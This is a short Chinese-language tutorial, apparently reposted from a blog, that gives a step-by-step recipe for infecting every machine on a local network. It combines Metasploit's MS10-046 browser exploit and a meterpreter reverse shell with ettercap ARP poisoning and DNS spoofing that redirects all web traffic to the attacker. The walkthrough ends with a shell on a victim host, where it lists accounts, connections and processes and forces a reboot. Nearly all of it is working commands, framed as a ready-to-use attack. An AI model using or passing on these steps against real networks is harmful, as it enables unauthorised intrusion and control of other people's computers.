作者:那年磕长头 | 来源:互联网 | 2023-07-20 17:00
物理主机:kali2.0 192.168.1.50
目标主机:整个局域网
运行msfconsole
依次输入:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块
setg SRVHOST 192.168.1.50 //设置全局服务主机IP
set PAYLOAD windows/meterpreter/reverse_tcp //加载PAYLOAD攻击模块
setg LHOST 192.168.1.50 //设置攻击模块全局主机IP
exploit //攻击
这么配置只要局域网内有哪一台主机访问到http://192.168.1.50:80/这个链接就会中马。
然后修改ettercap DNS文件。
文件目录:/etc/ettercap/etter.dns
用记事本打开它。
ctrl+f 搜索
关键字:# redirect it to http://www.linux.org
这样修改一下,如图。
# redirect it to http://www.linux.org
在下方依次添加
* A 192.168.1.50
* PTR 192.168.1.50
* .net 192.168.1.50
* .cn 192.168.1.50
* .com 192.168.1.50
然后保存即可。
打开终端,运行ettercap输入如下命令:
ettercap -T -q -i eth0 -P dns_spoof -M arp
-M MAC监听
-T 脱机监听
-P 过滤筛选器
-i 使用此网络接口
eth0 本机网卡
ARP拦截局域网所有的DNS映射到本机的etter.dns中
列表滚动,局域网内已经有机器在打开网页。
局域网主机只要一打开网页,DNS都会映射到本机的IP上,淫荡的中马。
sessions 查看,得到一台主机 192.168.1.12
sessions -i 1 进入劫持会话
shell -在受害者计算机上打开一个shell
net user // 查看计算机账户
netstat -ano //查看连接与开放的端口
这里可以看到192.168.1.12:1074与192.168.1.50:4444端口正在连接。
ps -列出正在运行的进程
getpid -获取当前进程 ID (PID)
3068
reboot重启对方计算机,输入后已经与192.168.1.12断开连接。